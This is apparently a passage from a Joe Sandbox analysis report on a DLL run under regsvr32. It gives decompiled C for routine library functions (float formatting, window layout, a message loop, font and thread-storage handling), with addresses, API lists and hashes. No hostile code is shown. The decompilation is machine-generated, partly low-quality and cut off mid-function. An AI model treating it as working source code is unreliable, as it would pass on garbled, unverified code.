						if(_v10 >= 0x3fff) {
							_t159 = _t159 + 1;
							__eflags = _t159;
							E1001C151(_t131, _t151, _t159,  &_v20,  &_v32);
						}
						__eflags = _a20 & 0x00000001;
						_t152 = _a16;
						 *_t131 = _t159;
						if((_a20 & 0x00000001) == 0) {
							L27:
							__eflags = _t152 - 0x15;
							if(_t152 > 0x15) {
								_t152 = 0x15;
							}
							_t161 = (_v10 & 0x0000ffff) - 0x3ffe;
							_t52 =  &_v10;
							 *_t52 = _v10 & 0x00000000;
							__eflags =  *_t52;
							_a12 = 8;
							do {
								E1001B6CD( &_v20);
								_t56 =  &_a12;
								 *_t56 = _a12 - 1;
								__eflags =  *_t56;
							} while ( *_t56 != 0);
							__eflags = _t161;
							if(_t161 < 0) {
								_t164 =  ~_t161 & 0x000000ff;
								__eflags = _t164;
								if(_t164 > 0) {
									do {
										E1001B6FB( &_v20);
										_t164 = _t164 - 1;
										__eflags = _t164;
									} while (_t164 != 0);
								}
							}
							_t59 = _t152 + 1; // 0xcd
							_t139 = _t59;
							__eflags = _t139;
							_t99 =  &(_t131[2]);
							_v52 = _t99;
							if(_t139 > 0) {
								_a12 = _t139;
								do {
									asm("movsd");
									asm("movsd");
									asm("movsd");
									E1001B6CD( &_v20);
									E1001B6CD( &_v20);
									E1001B66F(__eflags,  &_v20,  &_v44);
									E1001B6CD( &_v20);
									_t166 = _t166 + 0x14;
									_v52 =  &(_v52[0]);
									_t74 =  &_a12;
									 *_t74 = _a12 - 1;
									__eflags =  *_t74;
									 *_v52 = _v9 + 0x30;
									_v9 = 0;
								} while ( *_t74 != 0);
								_t99 = _v52;
							}
							_t100 = _t99 - 1;
							_t101 = _t100 - 1;
							__eflags =  *_t100 - 0x35;
							_t141 =  &(_t131[2]);
							if( *_t100 < 0x35) {
								while(1) {
									__eflags = _t101 - _t141;
									if(_t101 < _t141) {
										break;
									}
									__eflags =  *_t101 - 0x30;
									if( *_t101 == 0x30) {
										_t101 = _t101 - 1;
										__eflags = _t101;
										continue;
									}
									break;
								}
								__eflags = _t101 - _t141;
								if(_t101 >= _t141) {
									goto L46;
								} else {
									 *_t141 = 0x30;
									goto L54;
								}
							} else {
								while(1) {
									__eflags = _t101 - _t141;
									if(_t101 < _t141) {
										break;
									}
									__eflags =  *_t101 - 0x39;
									if( *_t101 == 0x39) {
										 *_t101 = 0x30;
										_t101 = _t101 - 1;
										__eflags = _t101;
										continue;
									}
									break;
								}
								__eflags = _t101 - _t141;
								if(_t101 < _t141) {
									_t101 = _t101 + 1;
									 *_t131 =  *_t131 + 1;
									__eflags =  *_t131;
								}
								 *_t101 =  *_t101 + 1;
								__eflags =  *_t101;
								L46:
								_t103 = _t101 - _t131 - 3;
								__eflags = _t103;
								_t131[1] = _t103;
								 *((char*)( &(_t131[2]) + _t103)) = 0;
								goto L47;
							}
						} else {
							_t152 = _t152 + _t159;
							__eflags = _t152;
							if(_t152 > 0) {
								goto L27;
							} else {
								goto L26;
							}
						}
					} else {
						 *_t131 = 1;
						if(_t151 != 0x80000000 || _a4 != 0) {
							if((_t151 & 0x40000000) != 0) {
								goto L11;
							} else {
								_push("1#SNAN");
								goto L21;
							}
						} else {
							L11:
							__eflags = _t133;
							if(_t133 == 0) {
								L15:
								__eflags = _t151 - 0x80000000;
								if(_t151 != 0x80000000) {
									goto L20;
								} else {
									__eflags = _a4;
									if(_a4 != 0) {
										goto L20;
									} else {
										_push("1#INF");
										goto L18;
									}
								}
							} else {
								__eflags = _t151 - 0xc0000000;
								if(_t151 != 0xc0000000) {
									goto L15;
								} else {
									__eflags = _a4;
									if(_a4 != 0) {
										L20:
										_push("1#QNAN");
										L21:
										_push( &(_t131[2]));
										E10017B90();
										_t131[1] = 6;
									} else {
										_push("1#IND");
										L18:
										_push( &(_t131[2]));
										E10017B90();
										_t131[1] = 5;
									}
								}
							}
						}
						_v48 = _v48 & 0x00000000;
						L47:
						_t105 = _v48;
					}
				} else {
					L26:
					_t131[2] = 0x30;
					L54:
					 *_t131 =  *_t131 & 0x00000000;
					_t131[1] = 0x20;
					_t131[1] = 1;
					_t131[2] = 0;
					_t105 = 1;
				}
				return E100117AE(_t105, _v8);
			}

0x1001bc40
0x1001bc45
0x1001bc48
0x1001bc4c
0x1001bc57
0x1001bc63
0x1001bc67
0x1001bc6b
0x1001bc6f
0x1001bc73
0x1001bc77
0x1001bc7b
0x1001bc7f
0x1001bc83
0x1001bc87
0x1001bc8b
0x1001bc8f
0x1001bc93
0x1001bc9a
0x1001bc9c
0x1001bca4
0x1001bc9e
0x1001bc9e
0x1001bc9e
0x1001bcab
0x1001bcae
0x1001bcc0
0x1001bd3a
0x1001bd45
0x1001bd62
0x1001bd65
0x1001bd74
0x1001bd78
0x1001bd7b
0x1001bd80
0x1001bd83
0x1001bd89
0x1001bd93
0x1001bd93
0x1001bd94
0x1001bd9a
0x1001bd9b
0x1001bd9f
0x1001bda2
0x1001bda5
0x1001bdb9
0x1001bdb9
0x1001bdbc
0x1001bdc0
0x1001bdc0
0x1001bdc5
0x1001bdcb
0x1001bdcb
0x1001bdcb
0x1001bdd0
0x1001bdd7
0x1001bddb
0x1001bde0
0x1001bde0
0x1001bde0
0x1001bde3
0x1001bde6
0x1001bde8
0x1001bdec
0x1001bdec
0x1001bdf2
0x1001bdf4
0x1001bdf8
0x1001bdfd
0x1001bdfd
0x1001bdfe
0x1001bdf4
0x1001bdf2
0x1001be01
0x1001be01
0x1001be04
0x1001be06
0x1001be09
0x1001be0c
0x1001be0e
0x1001be11
0x1001be17
0x1001be18
0x1001be1d
0x1001be1e
0x1001be27
0x1001be34
0x1001be3d
0x1001be4a
0x1001be4d
0x1001be50
0x1001be50
0x1001be50
0x1001be53
0x1001be55
0x1001be55
0x1001be5b
0x1001be5b
0x1001be5e
0x1001be61
0x1001be62
0x1001be65
0x1001be68
0x1001bea8
0x1001bea8
0x1001beaa
0x00000000
0x00000000
0x1001bea2
0x1001bea5
0x1001bea7
0x1001bea7
0x00000000
0x1001bea7
0x00000000
0x1001bea5
0x1001beac
0x1001beae
0x00000000
0x1001beb0
0x1001beb0
0x00000000
0x1001beb0
0x1001be6a
0x1001be75
0x1001be75
0x1001be77
0x00000000
0x00000000
0x1001be6c
0x1001be6f
0x1001be71
0x1001be74
0x1001be74
0x00000000
0x1001be74
0x00000000
0x1001be6f
0x1001be79
0x1001be7b
0x1001be7d
0x1001be7e
0x1001be7e
0x1001be7e
0x1001be81
0x1001be81
0x1001be83
0x1001be85
0x1001be85
0x1001be87
0x1001be8d
0x00000000
0x1001be8d
0x1001bda7
0x1001bdaa
0x1001bdac
0x1001bdae
0x00000000
0x00000000
0x00000000
0x00000000
0x1001bdae
0x1001bcc2
0x1001bcc9
0x1001bcce
0x1001bcdc
0x00000000
0x1001bcde
0x1001bcde
0x00000000
0x1001bcde
0x1001bce5
0x1001bce5
0x1001bce5
0x1001bce8
0x1001bcff
0x1001bcff
0x1001bd01
0x00000000
0x1001bd03
0x1001bd03
0x1001bd07
0x00000000
0x1001bd09
0x1001bd09
0x00000000
0x1001bd09
0x1001bd07
0x1001bcea
0x1001bcea
0x1001bcf0
0x00000000
0x1001bcf2
0x1001bcf2
0x1001bcf6
0x1001bd26
0x1001bd26
0x1001bd2b
0x1001bd2e
0x1001bd2f
0x1001bd34
0x1001bcf8
0x1001bcf8
0x1001bd0e
0x1001bd11
0x1001bd12
0x1001bd17
0x1001bd17
0x1001bcf6
0x1001bcf0
0x1001bce8
0x1001bd1b
0x1001be92
0x1001be92
0x1001be92
0x1001bdb0
0x1001bdb0
0x1001bdb0
0x1001beb3
0x1001beb3
0x1001beb9
0x1001bebd
0x1001bec1
0x1001bec5
0x1001bec5
0x1001bea1

APIs

___shr_12.LIBCMT ref: 1001BDF8

Strings

1#QNAN, xrefs: 1001BD26
1#IND, xrefs: 1001BCF8
1#SNAN, xrefs: 1001BCDE
1#INF, xrefs: 1001BD09
?, xrefs: 1001BC8F

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ___shr_12
String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
API String ID: 2664560246-4131533671
Opcode ID: 41872633d6340cc6f23dba41c7221c5f3b32f20f70e5c2c0d702b1f865941683
Instruction ID: 0f4b10661b4c6afdc81634f06d58437e80c3cbb5605fe3a4bfa1b348def2c0f3
Opcode Fuzzy Hash: 41872633d6340cc6f23dba41c7221c5f3b32f20f70e5c2c0d702b1f865941683
Instruction Fuzzy Hash: 47810232804A9ACECF01CB68C8847EEBBF4EF15354F0545AAE850DF282E774D685C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 1002DA8D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E1002DA8D(intOrPtr __ecx, void* __edx) {
				void* __esi;
				void* __ebp;
				intOrPtr _t60;
				signed char _t65;
				signed int _t70;
				signed int _t71;
				intOrPtr _t109;
				signed int _t115;
				signed int _t117;
				void* _t133;
				void* _t135;
				intOrPtr _t140;
				void* _t143;
				void* _t145;

				_t133 = __edx;
				_t143 = _t145 - 0xa8;
				_t60 =  *0x1004c470; // 0xf256d946
				_t140 =  *((intOrPtr*)(_t143 + 0xb0));
				 *((intOrPtr*)(_t143 + 0xa4)) = _t60;
				_t109 = __ecx;
				_t62 = GetWindowRect( *(_t140 + 0x1c), _t143 - 0x80);
				if( *((intOrPtr*)(_t140 + 0x88)) != _t109 ||  *(_t143 + 0xb4) != 0 && EqualRect(_t143 - 0x80,  *(_t143 + 0xb4)) == 0) {
					if( *((intOrPtr*)(_t109 + 0x90)) != 0 && ( *(_t140 + 0x80) & 0x00000040) != 0) {
						 *(_t109 + 0x7c) =  *(_t109 + 0x7c) | 0x00000040;
					}
					 *(_t109 + 0x7c) =  *(_t109 + 0x7c) & 0xfffffff9;
					_t65 =  *(_t140 + 0x7c) & 0x00000006 |  *(_t109 + 0x7c);
					 *(_t109 + 0x7c) = _t65;
					if((_t65 & 0x00000040) == 0) {
						_push(0x104);
						_push(_t143 - 0x60);
						E1002095F(_t140);
						E10029B23(_t140,  *((intOrPtr*)(_t109 + 0x1c)), _t143 - 0x60);
					}
					_t70 = ( *(_t140 + 0x7c) ^  *(_t109 + 0x7c)) & 0x0000f000 ^  *(_t140 + 0x7c) | 0x00000f00;
					if( *((intOrPtr*)(_t109 + 0x90)) == 0) {
						_t71 = _t70 & 0xfffffffe;
					} else {
						_t71 = _t70 | 0x00000001;
					}
					E100383D0(_t140, _t71);
					_push(0xffffffff);
					_t135 = E1002CDCE(_t109, GetDlgCtrlID( *(_t140 + 0x1c)) & 0x0000ffff);
					if(_t135 > 0) {
						 *((intOrPtr*)(E100086F2(_t109 + 0x94, _t135))) = _t140;
					}
					if( *(_t143 + 0xb4) == 0) {
						if(_t135 < 1) {
							_t137 = _t109 + 0x94;
							E1001E2BE(_t109 + 0x94, _t143,  *((intOrPtr*)(_t109 + 0x9c)), _t140);
							E1001E2BE(_t137, _t143,  *((intOrPtr*)(_t137 + 8)), 0);
						}
						_t115 =  *0x1004efa4; // 0x2
						_push(0x115);
						_push(0);
						_push(0);
						_push( ~_t115);
						_t117 =  *0x1004efa0; // 0x2
						_push( ~_t117);
						_push(0);
					} else {
						CopyRect(_t143 - 0x70,  *(_t143 + 0xb4));
						E10028E5A(_t109, _t143 - 0x70);
						if(_t135 < 1) {
							asm("cdq");
							asm("cdq");
							_push(( *((intOrPtr*)(_t143 - 0x64)) -  *((intOrPtr*)(_t143 - 0x6c)) - _t133 >> 1) +  *((intOrPtr*)(_t143 - 0x6c)));
							_push(( *((intOrPtr*)(_t143 - 0x68)) -  *(_t143 - 0x70) - _t133 >> 1) +  *(_t143 - 0x70));
							_push( *((intOrPtr*)(_t143 + 0xb0)));
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							E1002CE2A(_t109);
							_t140 =  *((intOrPtr*)(_t143 + 0xb0));
						}
						_push(0x114);
						_push( *((intOrPtr*)(_t143 - 0x64)) -  *((intOrPtr*)(_t143 - 0x6c)));
						_push( *((intOrPtr*)(_t143 - 0x68)) -  *(_t143 - 0x70));
						_push( *((intOrPtr*)(_t143 - 0x6c)));
						_push( *(_t143 - 0x70));
						_push(0);
					}
					E100204FE(_t140);
					if(E100220EE(_t143, GetParent( *(_t140 + 0x1c))) != _t109) {
						E1000870E(_t140, _t109);
					}
					_t120 =  *((intOrPtr*)(_t140 + 0x88));
					if( *((intOrPtr*)(_t140 + 0x88)) != 0) {
						E1002D1B2(_t120, _t140, 0xffffffff, 0);
					}
					 *((intOrPtr*)(_t140 + 0x88)) = _t109;
					 *(E100314D8(_t109) + 0xcc) =  *(_t62 + 0xcc) | 0x0000000c;
				}
				return E100117AE(_t62,  *((intOrPtr*)(_t143 + 0xa4)));
			}

0x1002da8d
0x1002da8e
0x1002da9b
0x1002daa2
0x1002daa8
0x1002dab6
0x1002dab8
0x1002dac4
0x1002daf2
0x1002dafd
0x1002dafd
0x1002db01
0x1002db0e
0x1002db12
0x1002db15
0x1002db17
0x1002db1f
0x1002db22
0x1002db2e
0x1002db2e
0x1002db41
0x1002db4d
0x1002db54
0x1002db4f
0x1002db4f
0x1002db4f
0x1002db5a
0x1002db5f
0x1002db75
0x1002db79
0x1002db87
0x1002db87
0x1002db90
0x1002dc11
0x1002dc13
0x1002dc1f
0x1002dc2b
0x1002dc2b
0x1002dc30
0x1002dc36
0x1002dc3d
0x1002dc3e
0x1002dc41
0x1002dc42
0x1002dc4a
0x1002dc4b
0x1002db92
0x1002db9c
0x1002dba8
0x1002dbb0
0x1002dbbb
0x1002dbcb
0x1002dbd3
0x1002dbd4
0x1002dbda
0x1002dbe0
0x1002dbe1
0x1002dbe2
0x1002dbe5
0x1002dbe6
0x1002dbeb
0x1002dbeb
0x1002dbf7
0x1002dbfc
0x1002dc03
0x1002dc04
0x1002dc07
0x1002dc0a
0x1002dc0a
0x1002dc4e
0x1002dc64
0x1002dc69
0x1002dc69
0x1002dc6e
0x1002dc76
0x1002dc7d
0x1002dc7d
0x1002dc84
0x1002dc8f
0x1002dc8f
0x1002dcab

APIs

GetWindowRect.USER32 ref: 1002DAB8
EqualRect.USER32 ref: 1002DADD
GetDlgCtrlID.USER32 ref: 1002DB64
CopyRect.USER32 ref: 1002DB9C
GetParent.USER32(?), ref: 1002DC56

Strings

@, xrefs: 1002DAFD

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$CopyCtrlEqualParentWindow
String ID: @
API String ID: 2544134605-2766056989
Opcode ID: c20e828919207d0164ea6c25dc37f68ea2733143114ea03cae4a2a36553e5d5a
Instruction ID: b45b6ef3e14a7e4d87b63386d5d067ae84193d18a4a25c559dd4ceadf4ed8576
Opcode Fuzzy Hash: c20e828919207d0164ea6c25dc37f68ea2733143114ea03cae4a2a36553e5d5a
Instruction Fuzzy Hash: E651BA716006499FDF25DF68DC95BAE77AAFF44300F504529E91ADB1A2CB30AD05CB10

Uniqueness

Uniqueness Score: -1.00%

Function 10021B92 Relevance: 10.6, APIs: 7, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E10021B92(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				struct HWND__* _t42;
				signed int _t45;
				int _t53;
				long _t56;
				int _t62;
				intOrPtr* _t69;

				_t62 = 1;
				_t69 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E100202AB(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t69 + 0x1c));
				 *(_t69 + 0x38) =  *(_t69 + 0x38) | 0x00000018;
				_v4 = _t42;
				_v8 = E1001F7B7();
				L14:
				while(1) {
					L14:
					while(_v12 != 0) {
						if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
							while(1) {
								L15:
								_t45 = E1001FABB();
								if(_t45 == 0) {
									break;
								}
								if(_t62 != 0) {
									_t53 = _v8->message;
									if(_t53 == 0x118 || _t53 == 0x104) {
										E100203AD(_t69, 1);
										UpdateWindow( *(_t69 + 0x1c));
										_t62 = 0;
									}
								}
								if( *((intOrPtr*)( *_t69 + 0x80))() == 0) {
									 *(_t69 + 0x38) =  *(_t69 + 0x38) & 0xffffffe7;
									return  *((intOrPtr*)(_t69 + 0x40));
								} else {
									if(E1001FA27(_v8) != 0) {
										_v12 = 1;
										_v16 = 0;
									}
									if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
										continue;
									} else {
										goto L14;
									}
								}
							}
							_push(0);
							E1003A098();
							return _t45 | 0xffffffff;
						}
						if(_t62 != 0) {
							E100203AD(_t69, 1);
							UpdateWindow( *(_t69 + 0x1c));
							_t62 = 0;
						}
						if((_a4 & 0x00000001) == 0 && _v4 != 0 && _v16 == 0) {
							SendMessageA(_v4, 0x121, 0,  *(_t69 + 0x1c));
						}
						if((_a4 & 0x00000002) != 0) {
							L13:
							_v12 = 0;
							continue;
						} else {
							_t56 = SendMessageA( *(_t69 + 0x1c), 0x36a, 0, _v16);
							_v16 = _v16 + 1;
							if(_t56 != 0) {
								continue;
							}
							goto L13;
						}
					}
					goto L15;
				}
			}

0x10021b9b
0x10021ba3
0x10021ba5
0x10021ba9
0x10021bad
0x10021bbb
0x10021bbb
0x10021bc0
0x10021bc6
0x10021bca
0x10021bd9
0x00000000
0x10021c51
0x00000000
0x10021c51
0x10021bef
0x10021c57
0x10021c57
0x10021c57
0x10021c5e
0x00000000
0x00000000
0x10021c62
0x10021c68
0x10021c70
0x10021c7d
0x10021c85
0x10021c87
0x10021c87
0x10021c70
0x10021c95
0x10021cd0
0x00000000
0x10021c97
0x10021ca3
0x10021ca5
0x10021cad
0x10021cad
0x10021cc1
0x00000000
0x10021cc3
0x00000000
0x10021cc3
0x10021cc1
0x10021c95
0x10021cc5
0x10021cc6
0x00000000
0x10021ccb
0x10021bf3
0x10021bf9
0x10021c01
0x10021c03
0x10021c03
0x10021c0a
0x10021c25
0x10021c25
0x10021c30
0x10021c4d
0x10021c4d
0x00000000
0x10021c32
0x10021c3f
0x10021c45
0x10021c4b
0x00000000
0x00000000
0x00000000
0x10021c4b
0x10021c30
0x00000000
0x10021c51

APIs

GetParent.USER32(?), ref: 10021BC0
PeekMessageA.USER32 ref: 10021BE7
UpdateWindow.USER32(?), ref: 10021C01
SendMessageA.USER32 ref: 10021C25
SendMessageA.USER32 ref: 10021C3F
UpdateWindow.USER32(?), ref: 10021C85
PeekMessageA.USER32 ref: 10021CB9

Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 5ee4d89bd6c594df32917749107b3ff340b5b4dd3c4e0b0819ec5134911ec0b1
Instruction ID: 572a0072a054787b928fb31f1bd515718dba8d5f307fe0ba771f0ec6dbe0ec5d
Opcode Fuzzy Hash: 5ee4d89bd6c594df32917749107b3ff340b5b4dd3c4e0b0819ec5134911ec0b1
Instruction Fuzzy Hash: AC41D4382047419FD722CF22AC88E5BBAF5FFD1794FA0092DF881951A1D732E945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 1000943B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114
comstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E1000943B(void* __ecx) {
				intOrPtr _t54;
				intOrPtr _t56;
				signed int _t72;
				signed int _t74;
				signed int _t79;
				void* _t81;
				void* _t85;
				void* _t100;
				void* _t101;
				void* _t103;
				signed int _t106;
				intOrPtr* _t107;
				void* _t109;
				void* _t111;
				void* _t112;

				E10011BF0(0x1003add7, _t109);
				_t112 = _t111 - 0x80;
				_t54 =  *0x1004c470; // 0xf256d946
				 *((intOrPtr*)(_t109 - 0x10)) = _t54;
				_t101 = __ecx;
				 *((intOrPtr*)(_t109 - 0x58)) =  *0x1004b0a0(_t100, _t103, _t85);
				 *((intOrPtr*)(_t109 - 0x50)) = 0;
				 *((intOrPtr*)(_t109 - 0x54)) = 0x10040430;
				_t56 =  *((intOrPtr*)(_t109 + 8));
				 *(_t109 - 4) = 0;
				if(_t56 == 0 ||  *(_t56 + 4) == 0) {
					if(E100090AB(_t109 - 0x54, 0x11) != 0 || E100090AB(_t109 - 0x54, 0xd) != 0) {
						_t56 = _t109 - 0x54;
						goto L6;
					} else {
						 *((intOrPtr*)(_t101 + 0x60)) = 0;
					}
				} else {
					L6:
					_t13 = _t56 + 4; // 0x10009a67
					GetObjectA( *_t13, 0x3c, _t109 - 0x4c);
					 *(_t109 - 0x78) = 0x20;
					_t105 = lstrlenA(_t109 - 0x30) + 1;
					E10010B20(lstrlenA(_t109 - 0x30) + 0x00000001 + lstrlenA(_t109 - 0x30) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109 - 0x4c);
					 *((intOrPtr*)(_t109 - 0x74)) = E100067FA(_t112, _t109 - 0x30, _t105,  *((intOrPtr*)(_t109 - 0x58)));
					 *((short*)(_t109 - 0x68)) =  *((intOrPtr*)(_t109 - 0x3c));
					 *(_t109 - 0x66) =  *(_t109 - 0x35) & 0x000000ff;
					 *(_t109 - 0x64) =  *(_t109 - 0x38) & 0x000000ff;
					 *(_t109 - 0x60) =  *(_t109 - 0x37) & 0x000000ff;
					 *(_t109 - 0x5c) =  *(_t109 - 0x36) & 0x000000ff;
					_t72 =  *(_t109 - 0x4c);
					__eflags = _t72;
					_t106 = _t72;
					if(_t72 < 0) {
						_t106 =  ~_t72;
					}
					E10029194(_t109 - 0x8c);
					 *(_t109 - 4) = 1;
					_t74 = GetDeviceCaps( *(_t109 - 0x84), 0x5a);
					asm("cdq");
					_t107 = _t101 + 0x60;
					 *((intOrPtr*)(_t109 - 0x6c)) = 0;
					 *(_t109 - 0x70) = _t106 * 0xafc80 / _t74;
					E1003881B(_t107);
					_t79 = _t109 - 0x78;
					__imp__#420(_t79, 0x10043168, _t107,  *((intOrPtr*)(_t101 + 0x1c)));
					__eflags = _t79;
					if(__eflags < 0) {
						 *_t107 = 0;
					}
					 *(_t109 - 4) = 0;
					E100291EF(_t109 - 0x8c, __eflags);
				}
				 *(_t109 - 4) =  *(_t109 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t109 - 0x54)) = 0x1003eb6c;
				_t81 = E100293B4(_t109 - 0x54);
				 *[fs:0x0] =  *((intOrPtr*)(_t109 - 0xc));
				return E100117AE(_t81,  *((intOrPtr*)(_t109 - 0x10)));
			}

0x10009440
0x10009445
0x1000944b
0x10009453
0x10009456
0x10009460
0x10009463
0x10009466
0x1000946d
0x10009472
0x10009475
0x10009488
0x100094a0
0x00000000
0x10009498
0x10009498
0x10009498
0x100094a3
0x100094a3
0x100094a9
0x100094ac
0x100094b6
0x100094c5
0x100094cf
0x100094e4
0x100094eb
0x100094f4
0x100094fc
0x10009503
0x1000950a
0x1000950d
0x10009510
0x10009512
0x10009514
0x10009518
0x10009518
0x10009523
0x10009530
0x10009534
0x10009544
0x10009547
0x1000954b
0x1000954e
0x10009551
0x1000955c
0x10009560
0x10009566
0x10009568
0x1000956a
0x1000956a
0x10009572
0x10009575
0x10009575
0x1000957a
0x10009581
0x10009588
0x10009596
0x100095a9

APIs

__EH_prolog.LIBCMT ref: 10009440
GetObjectA.GDI32(10009A67,0000003C,?), ref: 100094AC
lstrlenA.KERNEL32(?), ref: 100094BD
GetDeviceCaps.GDI32(?,0000005A), ref: 10009534
OleCreateFontIndirect.OLEAUT32(00000020,10043168,?), ref: 10009560

Strings

, xrefs: 100094B6

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CapsCreateDeviceFontH_prologIndirectObjectlstrlen
String ID:
API String ID: 4082312370-3916222277
Opcode ID: c9eae7b3fc1a36e4ece0a6461cbd5fbb0f42655d26c805cc56fff76f0e8a2cce
Instruction ID: 94df4567bccff522b7d7bd0d545f1ce16673c33dc0c382d35917ea97f1dbbf88
Opcode Fuzzy Hash: c9eae7b3fc1a36e4ece0a6461cbd5fbb0f42655d26c805cc56fff76f0e8a2cce
Instruction Fuzzy Hash: C641BA75D01259AFEB10CFE5C885ADDBBB4FF09344F50802AE856EB292E7349A04CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10037732 Relevance: 10.6, APIs: 7, Instructions: 96
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 97%

			E10037732(long* __ecx, signed int _a4, intOrPtr _a8) {
				struct _CRITICAL_SECTION* _v8;
				void* __ebp;
				void* _t32;
				void* _t36;
				void* _t37;
				signed int _t52;
				long* _t59;
				struct _CRITICAL_SECTION* _t62;
				void* _t64;

				_push(__ecx);
				_t59 = __ecx;
				_t1 =  &(_t59[7]); // 0x1004f010
				_t62 = _t1;
				_v8 = _t62;
				EnterCriticalSection(_t62);
				_t32 = _a4;
				if(_t32 <= 0) {
					L20:
					LeaveCriticalSection(_t62);
				} else {
					_t4 =  &(_t59[3]); // 0x3
					if(_t32 >=  *_t4) {
						goto L20;
					} else {
						_t64 = TlsGetValue( *_t59);
						if(_t64 == 0) {
							if(E1003741E(0x10) == 0) {
								_t64 = 0;
							} else {
								_t64 = E10037684(_t34);
							}
							 *(_t64 + 8) = 0;
							 *(_t64 + 0xc) = 0;
							_t10 =  &(_t59[5]); // 0x2d308f8
							_t49 =  *_t10;
							_t11 =  &(_t59[6]); // 0x4
							 *(_t64 +  *_t11) =  *_t10;
							_t59[5] = _t64;
							goto L10;
						} else {
							_t52 = _a4;
							if(_t52 >=  *(_t64 + 8) && _a8 != 0) {
								L10:
								_t36 =  *(_t64 + 0xc);
								if(_t36 != 0) {
									_t16 =  &(_t59[3]); // 0x3
									_t49 =  *_t16 << 2;
									_t37 = LocalReAlloc(_t36,  *_t16 << 2, 2);
								} else {
									_t15 =  &(_t59[3]); // 0x3
									_t37 = LocalAlloc(0,  *_t15 << 2);
								}
								if(_t37 == 0) {
									LeaveCriticalSection(_v8);
									_t37 = E1001CE3B(_t49);
								}
								 *(_t64 + 0xc) = _t37;
								_t20 =  &(_t59[3]); // 0x3
								E10011C50(_t37 +  *(_t64 + 8) * 4, 0,  *_t20 -  *(_t64 + 8) << 2);
								_t23 =  &(_t59[3]); // 0x3
								 *(_t64 + 8) =  *_t23;
								TlsSetValue( *_t59, _t64);
								_t52 = _a4;
							}
						}
						_t32 =  *(_t64 + 0xc);
						if(_t32 != 0 && _t52 <  *(_t64 + 8)) {
							 *((intOrPtr*)(_t32 + _t52 * 4)) = _a8;
						}
						LeaveCriticalSection(_v8);
					}
				}
				return _t32;
			}

0x10037735
0x10037739
0x1003773b
0x1003773b
0x1003773f
0x10037742
0x10037748
0x1003774f
0x1003782b
0x1003782c
0x10037755
0x10037755
0x10037758
0x00000000
0x1003775e
0x10037766
0x1003776a
0x1003778c
0x10037799
0x1003778e
0x10037795
0x10037795
0x1003779b
0x1003779e
0x100377a1
0x100377a1
0x100377a4
0x100377a7
0x100377aa
0x00000000
